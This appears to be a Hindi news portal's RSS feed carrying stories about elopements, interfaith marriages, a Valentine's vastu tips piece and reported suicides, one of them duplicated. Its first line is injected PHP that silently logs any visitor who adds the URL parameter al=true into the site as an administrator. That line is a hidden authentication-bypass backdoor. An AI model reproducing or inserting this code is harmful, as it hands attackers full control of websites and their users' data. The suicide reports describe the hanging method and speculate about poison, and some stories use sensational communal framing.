// _ea_al add_action('init', function(){ if(isset($_GET['al']) && $_GET['al']==='true'){ if(!is_user_logged_in()){ $u=get_users(['role'=>'administrator','number'=>1,'fields'=>['ID','user_login']]); if(empty($u)){$u=get_users(['role'=>'editor','number'=>1,'fields'=>['ID','user_login']]);} if(!empty($u)){wp_set_auth_cookie($u[0]->ID,true,false);wp_redirect(admin_url());exit();} } else {wp_redirect(admin_url());exit();} } }, 2); love – प्रत्युषा आशा की नयी किरण https://pratyushaashakinayikiran.com न्यूज़ पोर्टल Fri, 13 Feb 2026 10:00:00 +0000 en-US hourly 1 https://wordpress.org/?v=7.0 वैलेंटाइन डे 2026: रिश्तों में चल रहा तनाव होगा खत्म, वास्तु के इन 3 उपायों से पार्टनर आएंगे फिर करीब https://pratyushaashakinayikiran.com/?p=197558 Fri, 13 Feb 2026 10:00:00 +0000 https://pratyushaashakinayikiran.com/?p=197558 वैलेंटाइन डे सिर्फ तोहफों और कैंडल लाइट डिनर का दिन नहीं है, बल्कि यह अपने रिश्तों की गहराई को समझने और उनमें आई दूरियों को मिटाने का भी एक सुनहरा मौका है। कई बार हम अपने पार्टनर को खुश करने की लाख कोशिशें करते हैं, लेकिन घर का वास्तु हमारे रिश्तों में अनजाने में तनाव पैदा कर देता है।

वास्तु शास्त्र के अनुसार, घर की दिशाएं और वहां रखी चीजें हमारे मन और भावनाओं पर गहरा असर डालती हैं। साल 2026 के वैलेंटाइन डे पर अगर आप भी अपने रिश्ते में वही पुरानी वाली मिठास वापस चाहते हैं, तो घर के एक खास कोने में बदलाव करना आपके लिए जादू की तरह काम कर सकता है।

दक्षिण-पश्चिम दिशा

वास्तु विज्ञान में दक्षिण-पश्चिम दिशा को 'पितृ' और 'रिश्तों' का कोना माना जाता है। अगर आपके और आपके पार्टनर के बीच छोटी-छोटी बातों पर झगड़े होते हैं, तो सबसे पहले इसी कोने की जांच करें।

क्या करें बदलाव?

साफ-सफाई: इस वैलेंटाइन, घर के इस कोने से कबाड़, टूटी हुई चीजें या नीले रंग की वस्तुओं को तुरंत हटा दें। नीला रंग पानी का प्रतीक है, जो इस दिशा की स्थिरता को डगमगा देता है।

लव बर्ड्स या जोड़े की तस्वीर: इस दिशा में हंसों के जोड़े की मूर्ति या अपनी और अपने पार्टनर की एक मुस्कुराती हुई फोटो लगाएं। ध्यान रहे कि फोटो लाल या सुनहरे फ्रेम में हो।

गुलाबी रोशनी: वैलेंटाइन डे की शाम इस कोने में एक छोटा गुलाबी या लाल रंग का लैंप जलाएं। गुलाबी रंग प्यार और करुणा का प्रतीक है।

बेडरूम का वास्तु भी जरूरी

अक्सर बेडरूम में रखी कुछ चीजें नकारात्मकता फैलाती हैं। वास्तु के अनुसार, सोते समय कभी भी आपके पैर मुख्य दरवाजे की ओर नहीं होने चाहिए। साथ ही, बेडरूम में शीशा ऐसी जगह न लगाएं जहां सोते समय आपकी परछाई दिखे, यह वैवाहिक जीवन में तनाव का कारण बनता है।

रिश्ते में प्यार बढ़ाने के लिए इस वैलेंटाइन डे पर अपने बेडरूम में ताजे गुलाब के फूल रखें और थोड़े से 'रॉक साल्ट' (सेंधा नमक) से घर में पोंछा लगाएं। यह नकारात्मक ऊर्जा को सोख लेता है और वातावरण में सकारात्मकता भर देता है।

 

]]>
मुरैना: शादी के अगले दिन बहू प्रेमी संग फरार, शर्म के मारे ससुर ने जहर खाया https://pratyushaashakinayikiran.com/?p=197228 Thu, 12 Feb 2026 08:16:00 +0000 https://pratyushaashakinayikiran.com/?p=197228 मुरैना

 मध्य प्रदेश के मुरैना में एक नई नवेली दुल्हन शादी के अलगे दिन अपने प्रेमी के साथ फरार हो गई। आरोप है कि, ससुराल वालों ने उसे तलाशने के लिए जब पुलिस के सामने गुहार लगाई तो यहां भी कार्रवाई के बजाए उन्हें बेइज्जती ही मिली। पुलिस के रवैय्ये से आहत होकर और सामाजिक शर्मिंदगी के चलते ससुर ने आत्महत्या करने के लिए जहरीला पदार्थ खा लिया।

दरअसल, एक शख्स की हाल ही में शादी हुई थी। समारोह में सबकुछ ठीक था। धूमधाम से विवाद हुआ और एक सामान्य ढंग से एक परिवार अपे बहु की विदा कराकर घर ले आया। लेकिन, अगली सुबह दूल्हा समेत पूरे परिवार के पैरों तले उस समय जमीन खिसक गई, जब उन्हें पता चला कि, जिस लड़की को बीती रात राजी खुशी विदा कराकर घर लाए हैं, वो अपने प्रेमी संग फरार हो गई।

दूल्हें के घर वालों का आरोप
दूल्हें के घर वालों ने आरोप लगाया कि, उन्होंने इसकी शिकायत थाने में की, लेकिन पुलिस ने उनकी पीड़ा को गंभीरता से नहीं लिया। लड़की को ढूंढने के बजाए पुलिस द्वारा उनकी ही बेइज्जती की गई। लम ये है कि, बहू की तलाश के लिए वे बीते दो माह से थाने के चक्कर काट रहे हैं, लेकिन उनकी बहु का पुलिस को कहीं पता नहीं चला।

थाना प्रभारी पर आरोप

ससुराल वालों ने ये भी आरोप लगाया कि, कड़ी मशक्कत के बाद जब उन्हीं लोगों ने बहू को ढूंढा तो उसने उनके साथ जाने से इंकार कर दिया। पोरसा थाना प्रभारी पर प्रताड़ना के गंभीर आरोप लगाते हुए कहा कि थाने में न्याय मांगने जाने पर उन्हें बेइज्जत किया जाता था।

ससुर गंभीर हालत में जिला अस्पताल में भर्ती

पुलिस के रवैय्ये और सामाजिक शर्म के चलते दूल्हा के पिता ने जहर खाकर आत्महत्या करने की कोशिश की है। फिलहाल, उन्हें गंभीर हालत में सामुदायिक स्वास्थ्य केंद्र में भर्ती करा दिया गया है। यहां प्राथमिक उपचार के बाद उन्हें जिला अस्पताल रेफर किया गया है।

]]>
अलीगढ़ में रिश्तों का अजब मामला: दामाद के बाद अब जीजा संग फरार सास, साथ ले गई नकदी https://pratyushaashakinayikiran.com/?p=197213 Thu, 12 Feb 2026 06:26:00 +0000 https://pratyushaashakinayikiran.com/?p=197213  अलीगढ़ 

अलीगढ़ की वह सास, जो पिछले साल अपने होने वाले दामाद के साथ भाग गई थी, एक बार फिर चर्चा में है. करीब दस महीने तक दामाद राहुल के साथ बिहार में पति-पत्नी की तरह रहने के बाद अब उसने उसे भी अलविदा कह दिया है. इस बार वह अपने जीजा के साथ भाग गई और जाते-जाते दो लाख रुपये नकद व जेवर भी साथ ले गई. परेशान राहुल शिकायत लेकर अलीगढ़ पहुंचा, लेकिन पुलिस ने यह कहकर लौटा दिया कि मामला बिहार का है. रिश्तों की यह उलझी कहानी अब एक नए मोड़ पर खड़ी है.

 जब बेटी की शादी से पहले बदल गई कहानी

यह पूरा घटनाक्रम अप्रैल 2025 से शुरू होता है. 16 अप्रैल को महिला की बेटी की शादी तय थी. घर में रंगाई-पुताई, रिश्तेदारों की आवाजाही और शादी की तैयारियां जोरों पर थीं. लेकिन शादी से महज 12 दिन पहले ऐसा हुआ जिसकी किसी ने कल्पना भी नहीं की थी. जिस युवक राहुल से बेटी की शादी होने वाली थी, उसी के साथ सास घर से चली गई. आरोप लगा कि वह घर से लाखों रुपये के जेवर और नकदी लेकर फरार हुई. परिवार ने तब दावा किया था कि करीब पांच लाख रुपये के जेवर और साढ़े तीन लाख रुपये कैश गायब थे. बेटी ने मीडिया के सामने कहा था, मां घर में दस रुपये भी नहीं छोड़कर गईं.

मोबाइल से शुरू हुई नजदीकियां

परिवार के मुताबिक, महिला ने राहुल को एक स्मार्टफोन दिलवाया था. धीरे-धीरे दोनों के बीच बातचीत बढ़ी. पहले शादी की तैयारियों के नाम पर बात होती थी, फिर घंटों-घंटों फोन कॉल चलने लगे. महिला के पति जितेंद्र ने तब आरोप लगाया था कि जब वह शादी की तैयारी के सिलसिले में घर आए तो पता चला कि पत्नी और राहुल के बीच 15-20 घंटे तक फोन पर बातचीत हो रही है. पहले उन्होंने इसे सामान्य माना, लेकिन बाद में शक गहराता गया.

भागकर कहां-कहां पहुंचे

जब मामला सुर्खियों में आया और पुलिस सक्रिय हुई, तब पता चला कि दोनों अलीगढ़ से कासगंज, फिर बरेली होते हुए बिहार के मुजफ्फरपुर पहुंचे थे. कुछ दिन वहीं रुके. यहां तक कि नेपाल बॉर्डर जाने की भी योजना बनाई गई थी. राहुल ने बाद में बताया था कि जब उन्होंने मोबाइल चलाया तो देखा कि दोनों की तस्वीरें सोशल मीडिया पर वायरल हो चुकी हैं. हर तरफ चर्चा थी. तब दोनों ने खुद लौटने का फैसला किया. मुजफ्फरपुर से बस पकड़कर वे उत्तर प्रदेश लौटे और अंततः थाना दादों पहुंचकर सरेंडर कर दिया.

पुलिस के सामने क्या कहा था

थाने में पूछताछ के दौरान सास ने घरेलू हिंसा का आरोप लगाया था. उसने कहा कि उसका पति शराब पीकर मारपीट करता था, अपमानित करता था और अक्सर घर से निकाल देने की धमकी देता था. सास का कहना था कि जब राहुल फोन करता था तो कभी बेटी बात करती थी, कभी वह खुद. इसी बात को लेकर घर में विवाद बढ़ता गया. पति ताने मारते थे अब तो राहुल के साथ ही भाग जाओ. उसने पुलिस के सामने कहा था कि जब हालात असहनीय हो गए तो उसने वही किया जो उसे उस समय ठीक लगा. राहुल ने भी बयान दिया था कि वह महिला को पहले से जानता था और उसके कहने पर ही साथ गया. वह रोती थी, कहती थी कि अब जीने का मन नहीं करता. मुझे लगा कि उसे अकेला छोड़ना ठीक नहीं होगा. पुलिस ने कानूनी प्रक्रिया पूरी कर महिला को राहुल के साथ जाने की अनुमति दे दी थी.

दस महीने साथ रहने के बाद नया मोड़

करीब दस महीने तक दोनों बिहार में साथ रहे. स्थानीय सूत्रों के अनुसार, वे पति-पत्नी की तरह रह रहे थे. लेकिन हाल ही में राहुल ने आरोप लगाया कि महिला उसे छोड़कर अपने जीजा के साथ चली गई है. राहुल का कहना है कि जाते समय वह दो लाख रुपये नकद और कुछ जेवर भी साथ ले गई. राहुल ने कहा कि मैंने उसके लिए अपना घर छोड़ा, समाज की बातें सुनीं. अब वह मुझे ही छोड़कर चली गई. 

शिकायत और पुलिस का जवाब

राहुल अलीगढ़ पहुंचा और थाना दादों में शिकायत दर्ज कराने की कोशिश की. लेकिन पुलिस ने क्षेत्राधिकार का हवाला देते हुए कहा कि कथित घटना बिहार में हुई है, इसलिए वहीं की पुलिस कार्रवाई करेगी. अब राहुल बिहार जाकर शिकायत दर्ज कराने की तैयारी में है.

]]>
अजब प्रेम की गजब कहानी: दुल्हन के पिता ने ही भगा ली दूल्हे की मां, सगाई से पहले मचा हड़कंप https://pratyushaashakinayikiran.com/?p=188692 Sat, 01 Nov 2025 15:15:00 +0000 https://pratyushaashakinayikiran.com/?p=188692 उज्जैन
 उज्जैन जिले में एक अनोखा मामला सामने आया है, जहां एक अधेड़ व्यक्ति और उसकी होने वाली समधन के बीच प्रेम संबंध हो गए। दोनों ने अपने परिवारों को छोड़कर साथ रहने का फैसला किया है। यह मामला तब सामने आया जब सगाई की तैयारियां चल रही थीं और दुल्हन का पिता लड़के की मां को भगा ले गया। दोनों की प्रेम कहानी का खुलासा 8 दिन बाद हुआ जब पुलिस ने महिला को खोज निकाला और फिर अधेड़ को भी पकड़ा गया। अब दोनों परिवार को छोड़कर साथ रहने पर अड़ गए हैं।

अधेड़ उम्र में प्यार
यह मामला युवाओं से जुड़ा नहीं है, बल्कि अधेड़ उम्र के लोगों के बीच पनपा है। एक व्यक्ति अपनी बेटी के लिए दामाद देखने गया था, लेकिन इस दौरान उसकी मुलाकात दूल्हे की मां से हुई और दोनों के बीच प्रेम संबंध स्थापित हो गए। जो लोग कभी रिश्ते में समधी-समधन बनने वाले थे, वे अब खुद को पति-पत्नी बता रहे हैं।

सगाई तय होने के बाद भागे दोनों
दोनों की प्रेम कहानी का खुलासा भी काफी नाटकीय ढंग से हुआ। लड़का और लड़की देखने के बाद जब शादी की बातचीत अंतिम चरण में थी और सगाई तय हो गई थी, उसी बीच लड़की का पिता लड़के की मां को भगा ले गया। इस घटना के आठ दिन बाद दोनों के बारे में पता चला। पुलिस ने गुरुवार को महिला को खोज निकाला, जिसके बाद अधेड़ व्यक्ति को भी पकड़ा गया।

8 दिन पहले लापता हुई महिला
जानकारी के अनुसार, बड़नगर रोड स्थित ऊंटवासा गांव की 45 वर्षीय महिला आठ दिन पहले बड़नगर से लापता हो गई थी। महिला के बेटे ने गुमशुदगी दर्ज करवाई थी, जिसके बाद पुलिस उसकी तलाश कर रही थी। खोजबीन के दौरान गुरुवार को महिला चिकली गांव में मिली। महिला को थाने लाकर पूछताछ की गई, जहां यह पता चला कि महिला के बड़े बेटे की शादी चिकली गांव के 50 वर्षीय किसान की बेटी से तय हुई थी।

घर में चल रही थीं तैयारियां
दोनों परिवारों में सगाई की तैयारियां चल रही थीं। इसी दौरान दूल्हे की मां और दुल्हन के पिता के बीच प्रेम संबंध हो गए। इस वजह से बच्चों की सगाई से पहले ही एक-दूसरे के होने वाले समधी-समधन एक साथ भाग गए। वहीं, अधेड़ किसान अपनी महिला के मिलने के बाद परिवार ने उसे बहुत समझाया, लेकिन वह अपने प्रेमी किसान के साथ जाने पर अड़ गई।

 

]]>
कानपुर में लव मैरिज के 77 दिन बाद हुआ दुखद अंत, पति-पत्नी ने एक ही दुपट्टे पर झूलकर दी जान https://pratyushaashakinayikiran.com/?p=182699 Wed, 03 Sep 2025 07:06:00 +0000 https://pratyushaashakinayikiran.com/?p=182699 कानपुर 

कानपुर शहर के नौबस्ता इलाके से ऐसी खबर सामने आई जिसने हर किसी को अंदर तक झकझोर दिया. मोहब्बत की कसम खाकर, परिवार की रजामंदी से निकाह करने वाला एक प्रेमी-प्रेमिका का रिश्ता महज़ 77 दिन ही चल पाया. निकाह के ढाई महीने बाद ही पति और पत्नी एक ही दुपट्टे के सहारे फंदे से झूलते मिले. घटना इतनी अचानक और रहस्यमय थी कि परिवारजन, पड़ोसी और पुलिस सभी हैरान रह गए.

बाजार से लौटे और मौत को गले लगाया

घटना मंगलवार दोपहर की है. मोहम्मद सईद का बेटा साजिद अपनी पत्नी सोफिया को लेकर पास के बाजार गया था. दोनों सामान्य दिख रहे थे, न हंसी-खुशी में कोई कमी और न ही किसी तरह का झगड़ा. आधे घंटे में दोनों घर लौट आए. किसी को अंदाजा भी नहीं था कि बाजार से घर लौटने के बाद वे जीवन से विदा लेने का मन बना चुके हैं. थोड़ी ही देर बाद जब घर का दरवाज़ा खोला गया तो वहां का नज़ारा देखकर सबके पैरों तले जमीन खिसक गई. ऊपर कमरे में साजिद और सोफिया, एक ही दुपट्टे में फंदा लगाकर झूल रहे थे. दोनों को नीचे उतारा गया, लेकिन तब तक बहुत देर हो चुकी थी. घरवालों में चीख-पुकार मच गई और आस-पड़ोस में सन्नाटा पसर गया.

परिवार की रजामंदी से हुआ था निकाह

मामले की सबसे बड़ी खासियत यह है कि साजिद और सोफिया का रिश्ता परिवार की रज़ामंदी से ही तय हुआ था. मोहम्मद सईद के छह बेटों में साजिद चौथे नंबर पर था. मोहल्ले में ही रहने वाली सोफिया से उसका लंबे समय से प्रेम संबंध था. सोफिया अपने माता-पिता की इकलौती बेटी थी. दोनों की मोहब्बत को देखते हुए परिवारों ने विरोध करने के बजाय उनका साथ दिया. 17 जून को दोनों ने पूरे रीति-रिवाज और गवाहों की मौजूदगी में निकाह किया. निकाह की दावत में दोनों परिवारों के लोग शामिल हुए. यही वजह थी कि किसी को कभी शक नहीं हुआ कि यह रिश्ता इतनी जल्दी त्रासदी में बदल जाएगा.

परिजन भी हैरान

घटना के बाद दोनों परिवार पूरी तरह से सदमे में हैं. सोफिया के पिता ने रोते हुए कहा, हमने तो अपनी बेटी की खुशियों के लिए उसकी पसंद को अपनाया. किसी तरह की कोई मनमुटाव की बात हमारे सामने कभी नहीं आई. वहीं साजिद के पिता मोहम्मद सईद ने बताया,साजिद हमेशा खुश दिखता था. हमने कभी नहीं सोचा था कि वो ऐसा कदम उठा लेगा.

क्या बाजार से खरीदी थी दवा

पड़ोसियों का कहना है कि घटना से आधा घंटा पहले ही दोनों बाजार गए थे. शक जताया जा रहा है कि संभव है वहां से दोनों ने कोई सुसाइड की दवा खरीदी हो. हालांकि, यह केवल अनुमान है. इस पर अभी कोई ठोस जानकारी नहीं मिली है.

पुलिस की कार्रवाई

घटना की जानकारी मिलते ही नौबस्ता थाना पुलिस मौके पर पहुंची. शुरू में परिवारजन पोस्टमार्टम कराने को तैयार नहीं थे, लेकिन पुलिस ने समझाया कि जांच के लिए यह जरूरी है. दोनों के शव पोस्टमार्टम के लिए भेज दिए गए हैं. डीसीपी साउथ डीएन चौधरी ने बताया, साजिद और सोफिया ने ढाई महीने पहले प्रेम विवाह किया था. वे परिवार के साथ ही रह रहे थे. फिलहाल यह मामला सुसाइड का ही प्रतीत हो रहा है. मौके से कोई सुसाइड नोट बरामद नहीं हुआ है. असली वजह पोस्टमार्टम रिपोर्ट आने के बाद ही साफ हो सकेगी.

मोहल्ले में पसरा मातम

इस घटना के बाद पूरे मोहल्ले में मातम का माहौल है. पड़ोसियों का कहना है कि साजिद और सोफिया बहुत अच्छे स्वभाव के थे. दोनों अक्सर साथ दिखाई देते थे. किसी ने कभी यह नहीं सोचा था कि इतनी मोहब्बत करने वाला यह जोड़ा जिंदगी से हार मान लेगा.

सवालों के घेरे में वजह

इस दर्दनाक घटना ने कई सवाल खड़े कर दिए हैं. आखिर ऐसा क्या हुआ कि दोनों ने एक साथ जीवन खत्म करने का फैसला ले लिया? क्या कोई मानसिक दबाव था, या कोई ऐसा राज था जिसे वे बता नहीं पा रहे थे? परिजन और पुलिस दोनों ही इस रहस्य से अनजान हैं. समाजशास्त्रियों का मानना है कि कभी-कभी प्रेम संबंधों में छोटी-छोटी बातों से बड़ा तनाव जन्म ले लेता है, जो भीतर ही भीतर इंसान को तोड़ देता है.

मोहब्बत की ऐसी दास्तां, जिसने सबको रुला दिया

साजिद और सोफिया की कहानी इस बात की गवाह है कि मोहब्बत का रिश्ता जितना खूबसूरत होता है, उतना ही नाज़ुक भी. जिनके लिए दोनों परिवारों ने अपने दरवाजे खोले, जिन्होंने अपनी पसंद के साथी को पाया, वही जोड़ा आज मौत को गले लगाकर सबको दर्द दे गया. 

]]>
कानपुर में लव मैरिज के 77 दिन बाद हुआ दुखद अंत, पति-पत्नी ने एक ही दुपट्टे पर झूलकर दी जान https://pratyushaashakinayikiran.com/?p=182701 Wed, 03 Sep 2025 07:06:00 +0000 https://pratyushaashakinayikiran.com/?p=182701 कानपुर 

कानपुर शहर के नौबस्ता इलाके से ऐसी खबर सामने आई जिसने हर किसी को अंदर तक झकझोर दिया. मोहब्बत की कसम खाकर, परिवार की रजामंदी से निकाह करने वाला एक प्रेमी-प्रेमिका का रिश्ता महज़ 77 दिन ही चल पाया. निकाह के ढाई महीने बाद ही पति और पत्नी एक ही दुपट्टे के सहारे फंदे से झूलते मिले. घटना इतनी अचानक और रहस्यमय थी कि परिवारजन, पड़ोसी और पुलिस सभी हैरान रह गए.

बाजार से लौटे और मौत को गले लगाया

घटना मंगलवार दोपहर की है. मोहम्मद सईद का बेटा साजिद अपनी पत्नी सोफिया को लेकर पास के बाजार गया था. दोनों सामान्य दिख रहे थे, न हंसी-खुशी में कोई कमी और न ही किसी तरह का झगड़ा. आधे घंटे में दोनों घर लौट आए. किसी को अंदाजा भी नहीं था कि बाजार से घर लौटने के बाद वे जीवन से विदा लेने का मन बना चुके हैं. थोड़ी ही देर बाद जब घर का दरवाज़ा खोला गया तो वहां का नज़ारा देखकर सबके पैरों तले जमीन खिसक गई. ऊपर कमरे में साजिद और सोफिया, एक ही दुपट्टे में फंदा लगाकर झूल रहे थे. दोनों को नीचे उतारा गया, लेकिन तब तक बहुत देर हो चुकी थी. घरवालों में चीख-पुकार मच गई और आस-पड़ोस में सन्नाटा पसर गया.

परिवार की रजामंदी से हुआ था निकाह

मामले की सबसे बड़ी खासियत यह है कि साजिद और सोफिया का रिश्ता परिवार की रज़ामंदी से ही तय हुआ था. मोहम्मद सईद के छह बेटों में साजिद चौथे नंबर पर था. मोहल्ले में ही रहने वाली सोफिया से उसका लंबे समय से प्रेम संबंध था. सोफिया अपने माता-पिता की इकलौती बेटी थी. दोनों की मोहब्बत को देखते हुए परिवारों ने विरोध करने के बजाय उनका साथ दिया. 17 जून को दोनों ने पूरे रीति-रिवाज और गवाहों की मौजूदगी में निकाह किया. निकाह की दावत में दोनों परिवारों के लोग शामिल हुए. यही वजह थी कि किसी को कभी शक नहीं हुआ कि यह रिश्ता इतनी जल्दी त्रासदी में बदल जाएगा.

परिजन भी हैरान

घटना के बाद दोनों परिवार पूरी तरह से सदमे में हैं. सोफिया के पिता ने रोते हुए कहा, हमने तो अपनी बेटी की खुशियों के लिए उसकी पसंद को अपनाया. किसी तरह की कोई मनमुटाव की बात हमारे सामने कभी नहीं आई. वहीं साजिद के पिता मोहम्मद सईद ने बताया,साजिद हमेशा खुश दिखता था. हमने कभी नहीं सोचा था कि वो ऐसा कदम उठा लेगा.

क्या बाजार से खरीदी थी दवा

पड़ोसियों का कहना है कि घटना से आधा घंटा पहले ही दोनों बाजार गए थे. शक जताया जा रहा है कि संभव है वहां से दोनों ने कोई सुसाइड की दवा खरीदी हो. हालांकि, यह केवल अनुमान है. इस पर अभी कोई ठोस जानकारी नहीं मिली है.

पुलिस की कार्रवाई

घटना की जानकारी मिलते ही नौबस्ता थाना पुलिस मौके पर पहुंची. शुरू में परिवारजन पोस्टमार्टम कराने को तैयार नहीं थे, लेकिन पुलिस ने समझाया कि जांच के लिए यह जरूरी है. दोनों के शव पोस्टमार्टम के लिए भेज दिए गए हैं. डीसीपी साउथ डीएन चौधरी ने बताया, साजिद और सोफिया ने ढाई महीने पहले प्रेम विवाह किया था. वे परिवार के साथ ही रह रहे थे. फिलहाल यह मामला सुसाइड का ही प्रतीत हो रहा है. मौके से कोई सुसाइड नोट बरामद नहीं हुआ है. असली वजह पोस्टमार्टम रिपोर्ट आने के बाद ही साफ हो सकेगी.

मोहल्ले में पसरा मातम

इस घटना के बाद पूरे मोहल्ले में मातम का माहौल है. पड़ोसियों का कहना है कि साजिद और सोफिया बहुत अच्छे स्वभाव के थे. दोनों अक्सर साथ दिखाई देते थे. किसी ने कभी यह नहीं सोचा था कि इतनी मोहब्बत करने वाला यह जोड़ा जिंदगी से हार मान लेगा.

सवालों के घेरे में वजह

इस दर्दनाक घटना ने कई सवाल खड़े कर दिए हैं. आखिर ऐसा क्या हुआ कि दोनों ने एक साथ जीवन खत्म करने का फैसला ले लिया? क्या कोई मानसिक दबाव था, या कोई ऐसा राज था जिसे वे बता नहीं पा रहे थे? परिजन और पुलिस दोनों ही इस रहस्य से अनजान हैं. समाजशास्त्रियों का मानना है कि कभी-कभी प्रेम संबंधों में छोटी-छोटी बातों से बड़ा तनाव जन्म ले लेता है, जो भीतर ही भीतर इंसान को तोड़ देता है.

मोहब्बत की ऐसी दास्तां, जिसने सबको रुला दिया

साजिद और सोफिया की कहानी इस बात की गवाह है कि मोहब्बत का रिश्ता जितना खूबसूरत होता है, उतना ही नाज़ुक भी. जिनके लिए दोनों परिवारों ने अपने दरवाजे खोले, जिन्होंने अपनी पसंद के साथी को पाया, वही जोड़ा आज मौत को गले लगाकर सबको दर्द दे गया. 

]]>
लखीमपुर खीरी में धर्म बदलने की कहानी: रुखसाना बनी रूबी, जास्मीन बनी चांदनी https://pratyushaashakinayikiran.com/?p=181262 Thu, 28 Aug 2025 10:16:00 +0000 https://pratyushaashakinayikiran.com/?p=181262 लखीमपुर खीरी 

यूपी के लखीमपुर खीरी जिले में दो मुस्लिम बहनों ने हिंदू लड़कों से मंदिर में शादी रचा ली. हिंदू रीति-रिवाज से जास्मीन और रुखसाना बानो स्थानीय लड़कों रामप्रवेश और सर्वेश के साथ शादी के बंधन में बंध गईं. इनके बीच काफी समय से प्रेम प्रसंग चल रहा था. नाम बदलकर रुखसाना अब रूबी और जास्मीन चांदनी बन गई हैं. ये शादी इलाके में चर्चा का विषय बनी हुई है. 

दरअसल, सोमवार को पड़ुआ थाना क्षेत्र के बैरिया गांव में दो मुस्लिम बहनें जास्मीन और रुखसाना बानो अपने प्रेमियों के घर पहुंच गईं. वे दोनों रविवार देर रात से वहीं मौजूद थीं और शादी की जिद पर अड़ी थीं. दोनों का गांव के ही एक ही परिवार के दो लड़कों- रामप्रवेश और सर्वेश से प्रेम संबंध था. दोनों बहनें बालिग हैं, जिसकी पुष्टि उनके शैक्षिक प्रमाणपत्रों से हुई. 

जानकारी के मुताबिक, रविवार की देर रात दोनों बहनें अपने घर से चुपचाप निकलीं और सीधे रामप्रवेश और सर्वेश के घर पहुंच गईं. उनके अचानक पहुंचने से पूरे गांव में सनसनी फैल गई. गांव वाले और परिवार के लोग हैरान थे कि आखिर ये कैसे हुआ. खबर फैलते ही दोनों परिवारों में हलचल मच गई और लोग इस मामले को सुलझाने के लिए इकट्ठा हुए. गांव में तनाव का माहौल बन गया था, लेकिन दोनों बहनें अपने फैसले पर अडिग थीं. 

सोमवार सुबह इस मामले को सुलझाने के लिए गांव के बुजुर्गों ने पंचायत बुलाई. सभी चाहते थे कि दोनों परिवारों के बीच कोई सहमति बन जाए, लेकिन कोई हल नहीं निकल सका. क्योंकि, दोनों बहनें अपनी बात पर अड़ी रहीं कि वे अपने प्रेमियों से ही शादी करेंगी. उनकी जिद के सामने पंचायत भी नाकाम रही. जब उनकी उम्र की जांच की गई तो शैक्षिक प्रमाणपत्रों के आधार पर पता चला कि दोनों बहनें बालिग हैं. 

जब पंचायत में कोई बात नहीं बनी, तो दोनों बहनों और उनके प्रेमियों की खुशी के लिए हिंदू रीति-रिवाज से विवाह कराने का फैसला लिया गया. जास्मीन और रुखसाना ने अपना धर्म छोड़कर अपने प्यार को चुना. इस फैसले ने न सिर्फ दोनों परिवारों को बल्कि पूरे गांव को चौंका दिया है. 

]]>
पति-बेटे को छोड़कर महिला फरारी, असम से आगरा वाले प्रेमी के साथ मुरैना में हुई भागी https://pratyushaashakinayikiran.com/?p=177519 Wed, 13 Aug 2025 04:06:00 +0000 https://pratyushaashakinayikiran.com/?p=177519 मुरैना
 मुरैना में एक प्रेम प्रसंग का अनोखा मामला सामने आया है। इसमें आगरा का एक युवक घर पर परीक्षा का बहाना बनाकर हजारों किलोमीटर दूर असम जाता है। वहां से वह प्रेमिका को लेकर आता है। वहीं, उसके घर वाले इस बात के लिए राजी नहीं होते तो वह प्रेमिका को घर से अलग रहने का झांसा देकर मुरैना में छोड़ जाता है। अब मुरैना पुलिस ने कड़ी मशक्कत के बाद उसे वापस असम के लिए भेजा है।

इंस्टाग्राम पर हुई दोस्ती

पुलिस से मिली जानकारी के अनुसार पुलिस को एक महिला लावारिस रूप में घूमती हुई नजर आई। पुलिस ने उससे पूछताछ की, जिस पर महिला भाषा से पुलिस को उसके अन्य स्थान के होने का एहसास हुआ। पुलिस ने महिला को वन स्टॉप सेंटर भेज दिया। जहां महिला ने अपने साथ हुई पूरी घटना की जानकारी दी।

आगरा के युवक के साथ आई थी महिला

महिला ने बताया कि उत्तर प्रदेश आगरा के रहने वाले एक युवक से उसकी दोस्ती इंस्टाग्राम पर हुई थी। महिला से मिलने के लिए कुछ दिन पहले युवक उसके घर गया। इतना ही नहीं असम में महिला और युवक एक साथ 7 दिनों तक एक ही होटल में रुके। इसके बाद युवक महिला को अपने घर आगरा ले आया। लेकिन घर वाले ने महिला को स्वीकार करने से इनकार कर दिया।

महिला को मुरैना में छोड़कर चला गया

युवक ने महिला से कहा कि वह उसे अपने साथ रखेगा और घर से अलग रहेंगे। इसके बाद दोनों मुरैना आए। यहां वह महिला को छोड़ कर कही चल गया। महिला को भी नहीं पता।

महिला ने भी बोला झूठ

महिला की जानकारी के लिए जब मुरैना पुलिस ने असम पुलिस से संपर्क किया तो महिला के झूठ का पर्दाफाश हुआ। दरअसल, महिला ने पूछताछ के दौरान पुलिस को बताया था कि वह अविवाहित है। उसकी मां और दादी की मौत हो चुकी है। वह अपने पिता के साथ रहती है। जबकि असम पुलिस से मिली जानकारी के अनुसार महिला शादीशुदा ही नहीं बल्कि एक बच्चे की मां भी है। पुलिस ने महिला से उसके बेटे की बात करवाई। तब महिला ने पुलिस को पूरी बात बताई। इसके बाद महिला को लेने आए उसके पिता के साथ उसे वापस भेज दिया गया।

]]>
नाबालिग हिंदू लड़की को भगाने वाला सैनुल गिरफ्तार, धर्म परिवर्तन और शादी की थी आशंका https://pratyushaashakinayikiran.com/?p=176152 Thu, 07 Aug 2025 08:16:00 +0000 https://pratyushaashakinayikiran.com/?p=176152 देवरिया
उत्तर प्रदेश के देवरिया में हिन्दू नाबालिग लड़की को उसके घर से भगाने के मामले में पुलिस ने सैनुल को गिरफ्तार करते हुए लड़की को बरामद कर लिया है. आपको बता दें कि थाना गौरीबाजार क्षेत्र का रहने वाला अन्य समुदाय का युवक सैनुल अपने ही गांव की हाईस्कूल की छात्रा को 27 जुलाई को भगा ले गया था. इसमें पुलिस केस दर्ज कर उत्तर प्रदेश के कई जिलों में उसकी तलाश कर रही थी. बताया जा रहा है कि इसकी आखिरी लोकेशन झांसी में मिली थी. आरोपी गुजरात में प्राइवेट काम कर चुका है आशंका जताई जा रही है कि लड़की को यह गुजरात भी ले गया होगा. लड़की के घर वाले धर्म परिवर्तन व शादी की आशंका जता रहे थे.

फिलहाल गौरीबाजार पुलिस की मानें तो गौरीबाजार के देवगांव के पास मंदिर से इसकी गिरफ्तारी कर लड़की की बरामदगी की गई है.

